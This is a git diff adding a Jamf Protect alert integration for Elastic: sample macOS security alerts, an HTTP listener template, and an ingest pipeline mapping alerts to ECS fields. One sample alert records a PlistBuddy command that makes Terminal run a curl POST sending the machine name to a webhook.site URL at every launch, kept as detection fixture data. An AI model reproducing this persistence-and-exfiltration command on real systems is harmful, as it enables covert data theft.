}, + "pid": 3136, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:38Z", + "tty": "/dev/ttys016", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + ], + "ip": [ + "175.16.199.2" + ], + "user": [ + "root", + "local-admin" + ] + }, + "tags": [ + "DefenseEvasion", + "T1548.004", + "PrivilegeEscalation", + "MITREattack", + "AbuseElevationControlMechanism" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "terminal_persistence", + "category": [ + "host", + "file" + ], + "id": "4ecfd2ae-0f05-4b5d-8079-85f43d72ccf4", + "kind": "alert", + "provider": "Jamf Protect", + "severity": 0, + "start": "2024-01-31T13:30:53.090Z", + "type": [ + 
"change" + ] + }, + "file": { + "code_signature": { + "status": "code object is not signed at all" + }, + "gid": "20", + "hash": { + "sha1": "4410ab912212c5e196f063b5bb62b837c334e78d", + "sha256": "9ea2625bca753b36d358be22abb4ca672a538b80ec2b9de527f6beb2c961e245" + }, + "inode": "283232", + "mode": "33152", + "path": "/Users/john/Library/Preferences/com.apple.Terminal.plist", + "size": 29235, + "uid": "501" + }, + "group": { + "id": "20", + "name": "staff" + }, + "host": { + "hostname": "VMAC-41L97RNJT", + "id": "0000FE00-2134CAD3E728E967", + "ip": [ + "175.16.199.3" + ], + "os": { + "family": "macos", + "full": "Version 14.3 (Build 23D56)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/PlistBuddy", + "-c", + "Set :\"Window Settings\":Basic:CommandString 'curl -X POST -H \"Content-Type: application/json\" -d \"{\\\"computer_name\\\": \\\"VMAC-41L97RNJT\\\"}\" https://webhook.site/33654518-7909-455f-ab94-2b981036b12e'", + "/Users/john/Library/Preferences/com.apple.Terminal.plist" + ], + "code_signature": { + "signing_id": "com.apple.PlistBuddy", + "status": "No error." + }, + "entity_id": "76d0dd90-7aa2-418a-8f87-f3b21a83bb6c", + "executable": "/usr/libexec/PlistBuddy", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 3555, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-31T13:02:19Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "4f6dcbbb78f2015ce796756638bfa8ae3831d5ca", + "sha256": "5f9a5f0fde9f19d3493100d85a4faa9e2f7f08112ec4bd82a7dce4ea69de0f4e" + }, + "name": "PlistBuddy", + "parent": { + "code_signature": { + "signing_id": "com.apple.zsh", + "status": "No error." 
+ }, + "entity_id": "8afa3e04-ab59-48f1-87fa-bd42b2b1e71c", + "executable": "/bin/zsh", + "name": "zsh", + "pid": 4204, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-31T13:11:42Z", + "user": { + "id": "501" + } + }, + "pid": 4645, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-31T13:30:53Z", + "tty": "/dev/ttys000", + "user": { + "id": "501" + } + }, + "related": { + "hash": [ + "4410ab912212c5e196f063b5bb62b837c334e78d", + "9ea2625bca753b36d358be22abb4ca672a538b80ec2b9de527f6beb2c961e245", + "4f6dcbbb78f2015ce796756638bfa8ae3831d5ca", + "5f9a5f0fde9f19d3493100d85a4faa9e2f7f08112ec4bd82a7dce4ea69de0f4e" + ], + "ip": [ + "175.16.199.3" + ], + "user": [ + "john", + "root" + ] + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DockTileAdded", + "category": [ + "host", + "file" + ], + "id": "0090c24f-dcab-44f0-9395-1c2f5e688d4b", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "New Dock Tile registered", + "severity": 1, + "start": "2024-01-25T00:13:21.459Z", + "type": [ + "change" + ] + }, + "file": { + "code_signature": { + "signing_id": "com.setapp.DesktopClient", + "status": "No error.", + "team_id": "MEHY5QF425" + }, + "gid": "20", + "inode": "22894871", + "mode": "16877", + "path": "/Applications/Setapp.app", + "size": 96, + "uid": "501" + }, + "group": { + "id": "20" + }, + "host": { + "hostname": "LMAC-ZW0GTLVDL", + "id": "32EC79C5-26DC-535A-85F7-986F063297E2", + "ip": [ + "175.16.199.4" + ], + "os": { + "family": "macos", + "full": "Version 14.2 (Build 23C5030f)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate", + "com.setapp.DesktopClient", + "/Users/thijs", + "thijs" + ], + "code_signature": { + "signing_id": 
"Autoupdate-555549446afbe33f0c8f39a58f46e1bd35e14c86", + "status": "No error.", + "team_id": "MEHY5QF425" + }, + "entity_id": "b1b340e9-4fd9-4cdf-8602-cf7796828926", + "executable": "/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate", + "group_leader": { + "executable": "/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate", + "name": "Autoupdate", + "pid": 64885, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-25T00:09:02Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "e9a46b7ad0356aa655baa324d67b6abc762820df", + "sha256": "f6d8bd4d2864ec71c6628fe803458da6d7737575cde62e5044645de692e9e748" + }, + "name": "Autoupdate", + "parent": { + "pid": 64885 + }, + "pid": 64885, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-25T00:09:02Z", + "user": { + "id": "501" + } + }, + "related": { + "hash": [ + "e9a46b7ad0356aa655baa324d67b6abc762820df", + "f6d8bd4d2864ec71c6628fe803458da6d7737575cde62e5044645de692e9e748" + ], + "ip": [ + "175.16.199.4" + ] + }, + "tags": [ + "Persistence", + "BootOrLogonAutostartExecution", + "MITREattack", + "T1547" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "USBInserted", + "category": [ + "host" + ], + "id": "db492c7c-a301-43ab-afa3-fc02f661918f", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "USB device inserted", + "severity": 0, + "start": "2024-01-17T19:19:40.146Z" + }, + "host": { + "hostname": "LMAC-ZW0GTLVDL", + "id": "32EC79C5-26DC-535A-85F7-986F063297E2", + "ip": [ + "175.16.199.5" + ], + "os": { + "family": "macos", + "full": "Version 14.2 (Build 23C5030f)" + } + }, + "observer": { + "product": "Jamf 
Protect", + "vendor": "Jamf" + }, + "related": { + "ip": [ + "175.16.199.5" + ] + }, + "tags": [ + "Visibility" + ], + "volume": { + "bus_type": "XHC3", + "file_system_type": "GUID_partition_scheme", + "nt_name": "disk3", + "product_id": "0x5595", + "product_name": "Ultra USB 3.0", + "removable": true, + "serial_number": "4C531001410227100573", + "size": 15376000000, + "vendor_id": "0x0781", + "vendor_name": "SanDisk", + "writable": true + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "new_downloads", + "category": [ + "host", + "file" + ], + "id": "7288b17d-d2d1-4de7-b76a-df3529cfe0a8", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "severity": 0, + "start": "2023-09-28T08:13:18.877Z" + }, + "file": { + "code_signature": { + "signing_id": "JamfConnect-2", + "status": "No error.", + "team_id": "483DWKW443" + }, + "gid": "20", + "hash": { + "sha1": "0a5f0aa7cbe904e687341e2eee453348e3a3760d", + "sha256": "f7688a83f2c508c16128bd512e1d57b122824001a0c560b12b63c26d3cb7f4a0" + }, + "inode": "3900740", + "mode": "33188", + "path": "/Users/local-admin/Downloads/JamfConnect-2.27.0.dmg", + "size": 35249769, + "uid": "501" + }, + "group": { + "id": "20", + "name": "staff" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "175.16.199.6" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "related": { + "hash": [ + "0a5f0aa7cbe904e687341e2eee453348e3a3760d", + "f7688a83f2c508c16128bd512e1d57b122824001a0c560b12b63c26d3cb7f4a0" + ], + "ip": [ + "175.16.199.6" + ], + "user": [ + "local-admin" + ] + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "XProtect Remediator Scan Activity", + "category": [ + "host" + ], + "id": "7E46E4CD-0999-44C7-8EEE-6AC21876126E", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "XProtect 
Remediator Scan Activity", + "severity": 0, + "start": "2023-11-08T08:42:24.315Z" + }, + "host": { + "hostname": "PCJVW6XJGM", + "id": "00006000-000678310153401E", + "ip": [ + "175.16.199.7" + ], + "os": { + "family": "macos", + "full": "Version 13.6.1 (Build 22G313)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "XProtectRemediatorGreenAcre", + "pid": 6925, + "start": "2023-11-08T08:42:24.315Z" + }, + "related": { + "ip": [ + "175.16.199.7" + ] + }, + "tags": [ + "XProtect Remediator" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "XProtect Remediator Scan Activity", + "category": [ + "host" + ], + "id": "7E46E4CD-0999-44C7-8EEE-6AC21876126E", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "XProtect Remediator Scan Activity", + "severity": 0, + "start": "2023-11-08T08:42:24.315Z" + }, + "host": { + "hostname": "PCJVW6XJGM", + "id": "00006000-000678310153401E", + "ip": [ + "175.16.199.8" + ], + "os": { + "family": "macos", + "full": "Version 13.6.1 (Build 22G313)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "XProtectRemediatorGreenAcre", + "pid": 6925, + "start": "2023-11-08T08:42:24.315Z" + }, + "related": { + "ip": [ + "175.16.199.8" + ] + }, + "tags": [ + "XProtect Remediator" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "XProtect Remediator Scan Activity", + "category": [ + "host" + ], + "id": "CE2F93FE-F786-4BBC-B893-3F98D82488A7", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "XProtect Remediator Scan Activity", + "severity": 0, + "start": "2024-01-31T23:39:35.695Z" + }, + "host": { + "hostname": "mike.test’s MacBook Pro", + "id": "00008103-001C70A61AA2001E", + "ip": [ + "175.16.199.9", + "175.16.199.18" + ], + "os": { + "family": "macos", + "full": "Version 14.3 (Build 23D56)" + } + }, + "observer": { + 
"product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "XProtectRemediatorWaterNet", + "pid": 4052, + "start": "2024-01-31T23:39:35.695Z" + }, + "related": { + "ip": [ + "175.16.199.9", + "175.16.199.18" + ] + }, + "tags": [ + "XProtect Remediator" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "JCDaemon TPE Reasoning", + "category": [ + "host" + ], + "id": "36E81FA3-A9DA-4050-ABF5-B9738C23A587", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "JCDaemon TPE Reasoning", + "severity": 0, + "start": "2024-01-29T22:32:29.631Z" + }, + "host": { + "hostname": "Mike’s Virtual Machine", + "id": "0000FE00-6AD2C3C48DAB92D4", + "ip": [ + "175.16.199.10" + ], + "os": { + "family": "macos", + "full": "Version 14.2.1 (Build 23C71)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "JCDaemon", + "pid": 2618, + "start": "2024-01-29T22:32:29.631Z" + }, + "related": { + "ip": [ + "175.16.199.10" + ] + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "LoginWindow TouchID Success", + "category": [ + "host" + ], + "id": "AF42B6FF-66D0-4808-8B4D-D7594D62A79B", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "LoginWindow TouchID Success", + "severity": 0, + "start": "2024-01-29T13:47:19.430Z" + }, + "host": { + "hostname": "MBP14-MWARD-SONOMA", + "id": "00006000-000259581A04401E", + "ip": [ + "175.16.199.11" + ], + "os": { + "family": "macos", + "full": "Version 14.3 (Build 23D56)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "loginwindow", + "pid": 7695, + "start": "2024-01-29T13:47:19.430Z" + }, + "related": { + "ip": [ + "175.16.199.11" + ] + }, + "tags": [ + "login", + "touchid" + ] + } + ] +} \ No newline at end of file 
diff --git a/packages/jamf_protect/data_stream/alerts/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/alerts/agent/stream/http_endpoint.yml.hbs
new file mode 100644
index 00000000000..b1f76c36101
--- /dev/null
+++ b/packages/jamf_protect/data_stream/alerts/agent/stream/http_endpoint.yml.hbs
@@ -0,0 +1,35 @@
+listen_address: {{listen_address}}
+listen_port: {{listen_port}}
+url: {{url}}
+{{#if secret_header}}
+secret.header: {{secret_header}}
+{{/if}}
+{{#if secret_value}}
+secret.value: {{secret_value}}
+{{/if}}
+{{#if preserve_original_event}}
+preserve_original_event: true
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+preserve_duplicate_custom_fields: true
+{{/if}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if ssl}}
+ssl: {{ssl}}
+{{/if}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..4686df7d16e
--- /dev/null
+++ b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml
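Review bot: `secret.header` and `secret.value` are each guarded by their own `{{#if}}`, so a policy that fills in only one of them renders half of the shared-secret check, and a policy that fills in neither renders a listener on `{{listen_address}}:{{listen_port}}` that accepts any POST to `url` with nothing in the template making that visible. If the secret is meant to be mandatory, enforce it where the variables are declared (required variables in the manifest) rather than here, and at minimum add a template comment above the first guard such as `{{! secret.header and secret.value must both be set; without them the endpoint accepts unauthenticated requests }}`. The same applies to `{{#if ssl}}`: when `ssl` is unset the listener is plain HTTP and the secret header travels in the clear. The rendered values are also inserted unquoted, so a secret containing YAML-significant characters (`:`, `#`, a leading quote) would presumably break the generated configuration rather than be rejected; worth checking against how the other http_endpoint templates in this repository handle it.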
@@ -0,0 +1,494 @@ +--- +description: Pipeline for parsing Jamf Protect Alert and Unified Logging logs +processors: + - set: + field: ecs.version + value: '8.11.0' + - json: + field: message + target_field: jamf_protect.alerts + if: ctx.message != null + - rename: + field: json + target_field: jamf_protect.alerts + if: ctx.json != null + +########################## +## ECS Observer Mapping ## +########################## + - set: + field: observer.product + value: Jamf Protect + - set: + field: observer.vendor + value: Jamf + +####################### +## ECS Event Mapping ## +####################### + - set: + field: event.kind + value: alert + - set: + field: event.provider + value: Jamf Protect + - date: + field: jamf_protect.alerts.input.match.event.timestamp + target_field: event.start + formats: + - UNIX + if: ctx.jamf_protect?.alerts?.input?.match?.event?.timestamp != null + - append: + field: event.category + value: host + - append: + field: event.category + value: malware + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPThreatMatchExecEvent' + - append: + field: event.category + value: process + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPProcessEvent' + - append: + field: event.category + value: file + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' + - append: + field: event.category + value: file + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPDownloadEvent' + - rename: + field: ctx.jamf_protect.alerts.input.match.facts[0].name + target_field: rule.name + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].name != null + ignore_missing: true + - rename: + field: ctx.jamf_protect?.alerts.input.match.facts[0].name + target_field: rule.description + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].human != null + ignore_missing: true + - script: + description: Populates event.action with the name of the event + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.match?.facts != null && 
ctx.jamf_protect.alerts.input.match.facts.size() > 0) { + if (ctx.jamf_protect.alerts.input.match.facts[0].containsKey('name')) { + ctx.event.action = ctx.jamf_protect.alerts.input.match.facts[0].name; + } + } + ignore_failure: true + - script: + description: Populates event.reason with the name of the event + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.match?.facts != null && ctx.jamf_protect.alerts.input.match.facts.size() > 0) { + if (ctx.jamf_protect.alerts.input.match.facts[0].containsKey('human')) { + ctx.event.reason = ctx.jamf_protect.alerts.input.match.facts[0].human; + } + } + ignore_failure: true + - script: + description: Populates event.tags with tags from the event + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.match?.facts != null && ctx.jamf_protect.alerts.input.match.facts.size() > 0) { + if (ctx.jamf_protect.alerts.input.match.facts[0].containsKey('tags')) { + ctx.tags = ctx.jamf_protect.alerts.input.match.facts[0].tags; + } + } + ignore_failure: true + - rename: + field: jamf_protect.alerts.input.match.uuid + target_field: event.id + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.match?.uuid != null + - rename: + field: jamf_protect.alerts.input.match.severity + target_field: event.severity + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.match?.severity != null + + - set: + field: event.outcome + value: failure + if: ctx.jamf_protect?.alerts?.input?.match?.actions[0]?.name == "Prevented" + - set: + field: event.outcome + value: success + if: ctx.jamf_protect?.alerts?.input?.match?.actions[0]?.name == "Report" + - set: + field: event.outcome + value: unknown + if: ctx.jamf_protect?.alerts?.input?.match?.actions[0]?.name == null + +####################### +## ECS Host Mapping ## +####################### + - rename: + field: jamf_protect.alerts.input.host.hostname + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.host?.hostname != null + - 
rename: + field: jamf_protect.alerts.input.host.provisioningUDID + target_field: host.id + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.host?.provisioningUDID != null + - rename: + field: jamf_protect.alerts.input.host.ips + target_field: host.ip + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.host?.ips != null && ctx.jamf_protect?.alerts?.input?.host?.ips != "" + - rename: + field: jamf_protect.alerts.input.host.os + target_field: host.os.full + if: ctx.jamf_protect?.alerts?.input?.host?.os != null + ignore_missing: true + - set: + field: host.os.family + value: macos + +######################## +## ECS Source Mapping ## +######################## + - script: + description: Script processor to capture user names from related.users array + lang: painless + source: | + if (ctx.jamf_protect?.alerts?.input?.related?.users != null && ctx.jamf_protect.alerts.input.related.users.size() > 0) { + ArrayList userNames = new ArrayList(); + + for (def user : ctx.jamf_protect.alerts.input.related.users) { + if (user.containsKey('name') && user['name'] != null) { + userNames.add(user['name']); + } + } + if (userNames.size() > 0) { + ctx.related = ctx.related ?: new HashMap(); + ctx.related.user = userNames; + } + } + +######################## +# ECS File Mapping ## +######################## + - append: + field: event.type + value: creation + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 0 + - append: + field: event.type + value: deletion + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 1 + - append: + field: event.type + value: change + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 3 + - append: + field: event.type + value: change + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && 
ctx.jamf_protect?.alerts?.input?.match?.event?.type == 4 + - append: + field: event.type + value: creation + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 7 + + - script: + description: One scripting processor to capture all the related file information for the related file. + lang: painless + if: ctx.jamf_protect?.alerts?.input?.related?.files != null && ctx.jamf_protect?.alerts?.input?.related?.files.size() > 0 + source: > + if (ctx.jamf_protect.alerts.input.related.files.size() > 0) { + def file = ctx.jamf_protect.alerts.input.related.files[0]; + + ctx.file = ctx.file ?: new HashMap(); + + ctx.file.path = file.path; + ctx.file.size = file.size; + ctx.file.inode = String.valueOf(file.inode); + ctx.file.gid = String.valueOf(file.gid); + ctx.file.mode = String.valueOf(file.mode); + ctx.file.uid = String.valueOf(file.uid); + + ctx.file.hash = ctx.file.hash ?: new HashMap(); + ctx.file.hash.sha1 = file.sha1hex; + ctx.file.hash.sha256 = file.sha256hex; + + ctx.file.code_signature = ctx.file.code_signature ?: new HashMap(); + ctx.file.code_signature.signing_id = file.signingInfo?.appid; // Use safe navigation for nested objects + ctx.file.code_signature.status = file.signingInfo?.statusMessage; + ctx.file.code_signature.team_id = file.signingInfo?.teamid; + } + +###################### +## ECS Process Mapping ## +###################### + - append: + field: event.type + value: + - start + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPProcessEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 1 + - append: + field: event.type + value: end + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPProcessEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 2 + - script: + description: One scripting processor to capture all the related process information for the current process. 
+ lang: painless + if: ctx.jamf_protect?.alerts?.input?.related?.processes != null && ctx.jamf_protect?.alerts?.input?.related?.processes.size() > 0 + source: > + if (ctx.jamf_protect?.alerts?.input?.related?.processes != null && ctx.jamf_protect.alerts.input.related.processes.size() > 0) { + def process = ctx.jamf_protect.alerts.input.related.processes[0]; + def binary = ctx.jamf_protect.alerts.input.related.binaries[0]; + + ctx.process = ctx.process ?: new HashMap(); + ctx.process.name = process.name; + ctx.process.executable = process.path; + ctx.process.pid = process.pid; + if (process.containsKey('startTimestamp')) { + ctx.process.start = Instant.ofEpochSecond(process.startTimestamp).toString(); + } + if (process?.exitCode != null) { + ctx.process.exit_code = process.exitCode; + } + ctx.process.args = process.args ?: new ArrayList(); + ctx.process.tty = process.tty; + ctx.process.entity_id = process.uuid; + + ctx.process.parent = new HashMap(); + ctx.process.parent.pid = process.responsiblePID; + + ctx.process.user = new HashMap(); + ctx.process.user.id = process.uid.toString(); + + ctx.process.group_leader = new HashMap(); + if (process?.pgid != null) { + ctx.process.group_leader.pid = process.pgid; + } + ctx.process.group_leader.group = new HashMap(); + if (process?.gid != null) { + ctx.process.group_leader.group.id = process.gid.toString(); + } + + ctx.process.real_user = new HashMap(); + if (process?.ruid != null) { + ctx.process.real_user.id = process.ruid.toString(); + } + + ctx.process.real_group = new HashMap(); + if (process?.rgid != null) { + ctx.process.real_group.id = process.rgid.toString(); + } + + ctx.process.hash = ctx.process.hash ?: new HashMap(); + if (binary?.sha1hex != null) { + ctx.process.hash.sha1 = binary.sha1hex; + } + if (binary?.sha256hex != null) { + ctx.process.hash.sha256 = binary.sha256hex; + } + + ctx.process.code_signature = ctx.process.code_signature ?: new HashMap(); + if (process.signingInfo?.appid != null) { + 
ctx.process.code_signature.signing_id = process.signingInfo.appid; + } + if (process.signingInfo?.statusMessage != null) { + ctx.process.code_signature.status = process.signingInfo.statusMessage; + } + if (process?.signingInfo?.teamid != null) { + ctx.process.code_signature.team_id = process.signingInfo.teamid; + } + + // Mapping out the parent process + if (ctx.jamf_protect.alerts.input.related.processes.size() > 1) { + def parentProcess = ctx.jamf_protect.alerts.input.related.processes[1]; + + ctx.process.parent = new HashMap(); + ctx.process.parent.name = parentProcess.name; + ctx.process.parent.pid = parentProcess.pid; + ctx.process.parent.executable = parentProcess.path; + ctx.process.parent.entity_id = parentProcess.uuid; + + if (parentProcess.containsKey('startTimestamp')) { + ctx.process.parent.start = Instant.ofEpochSecond(parentProcess.startTimestamp).toString(); + } + + ctx.process.parent.user = new HashMap(); + if (parentProcess?.uid != null) { + ctx.process.parent.user.id = parentProcess.uid.toString(); + } + + ctx.process.parent.real_user = new HashMap(); + if (parentProcess?.ruid != null) { + ctx.process.parent.real_user.id = parentProcess.ruid.toString(); + } + + ctx.process.parent.real_group = new HashMap(); + if (parentProcess?.rgid != null) { + ctx.process.parent.real_group.id = parentProcess.rgid.toString(); + } + + ctx.process.parent.code_signature = ctx.process.parent.code_signature ?: new HashMap(); + if (parentProcess.signingInfo?.appid != null) { + ctx.process.parent.code_signature.signing_id = parentProcess.signingInfo.appid; + } + if (parentProcess.signingInfo?.statusMessage != null) { + ctx.process.parent.code_signature.status = parentProcess.signingInfo.statusMessage; + } + if (parentProcess?.signingInfo?.teamid != null) { + ctx.process.parent.code_signature.team_id = parentProcess.signingInfo.teamid; + } + + } + + // Mapping out the process group leader, which can be the same as parent + def processGroupLeader = 
ctx.jamf_protect.alerts.input.related.processes[ctx.jamf_protect.alerts.input.related.processes.size() - 1]; + ctx.process.group_leader = new HashMap(); + ctx.process.group_leader.name = processGroupLeader.name; + ctx.process.group_leader.pid = processGroupLeader.pid; + ctx.process.group_leader.executable = processGroupLeader.path; + + if (processGroupLeader.containsKey('startTimestamp')) { + ctx.process.group_leader.start = Instant.ofEpochSecond(processGroupLeader.startTimestamp).toString(); + } + + ctx.process.group_leader.user = new HashMap(); + if (processGroupLeader?.uid != null) { + ctx.process.group_leader.user.id = processGroupLeader.uid.toString(); + } + + ctx.process.group_leader.real_user = new HashMap(); + if (processGroupLeader?.ruid != null) { + ctx.process.group_leader.real_user.id = processGroupLeader.ruid.toString(); + } + + ctx.process.group_leader.real_group = new HashMap(); + if (processGroupLeader?.rgid != null) { + ctx.process.group_leader.real_group.id = processGroupLeader.rgid.toString(); + } + } + +###################### +## ECS Group Mapping ## +###################### + - script: + description: One scripting processor to capture all the related group information for the event. 
+ lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.related?.groups != null && ctx.jamf_protect.alerts.input.related.groups.size() > 0) { + def group = ctx.jamf_protect.alerts.input.related.groups[0]; + + ctx.group = ctx.group ?: new HashMap(); + + ctx.group.name = group.name; + ctx.group.id = group.gid.toString(); + } + +######################## +# ECS Threat Mapping ## +######################## + - set: + field: threat.framework + value: "MITRE ATT&CK" + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].tags.contains("MITREattack") + - set: + field: threat.software.platforms + value: macOS + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].tags.contains("MITREattack") + +######################## +# ECS Related Mapping ## +######################## + - append: + field: related.hosts + value: "{{ host.name }}" + if: ctx.host?.name != null + allow_duplicates: false + - append: + field: related.user + value: "{{ user.name }}" + if: ctx.user?.name != null + allow_duplicates: false + # - append: + # field: related.ip + # value: "{{ host.ip }}" + # if: ctx.host?.ip != null + # allow_duplicates: false + - foreach: + field: host.ip + if: ctx.host?.ip instanceof List + processor: + append: + field: related.ip + value: '{{{_ingest._value}}}' + allow_duplicates: false + - append: + field: related.hash + value: "{{ file.hash.sha1 }}" + if: ctx.file?.hash?.sha1 != null + allow_duplicates: false + - append: + field: related.hash + value: "{{ file.hash.sha256 }}" + if: ctx.file?.hash?.sha256 != null + allow_duplicates: false + - append: + field: related.hash + value: "{{ process.hash.sha1 }}" + if: ctx.process?.hash?.sha1 != null + allow_duplicates: false + - append: + field: related.hash + value: "{{ process.hash.sha256 }}" + if: ctx.process?.hash?.sha256 != null + allow_duplicates: false + + +####################### +## ECS pipelines ## +####################### + - pipeline: + name: '{{ IngestPipeline "gpusbevent" }}' + if: 
ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" + - pipeline: + name: '{{ IngestPipeline "gpunifiedlogevent" }}' + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" + + +############# +## Cleanup ## +############# + - remove: + field: + - jamf_protect.alerts + - jamf_protect + - message + ignore_missing: true + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpunifiedlogevent.yml b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpunifiedlogevent.yml new file mode 100644 index 00000000000..7972a47e4f7 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpunifiedlogevent.yml 
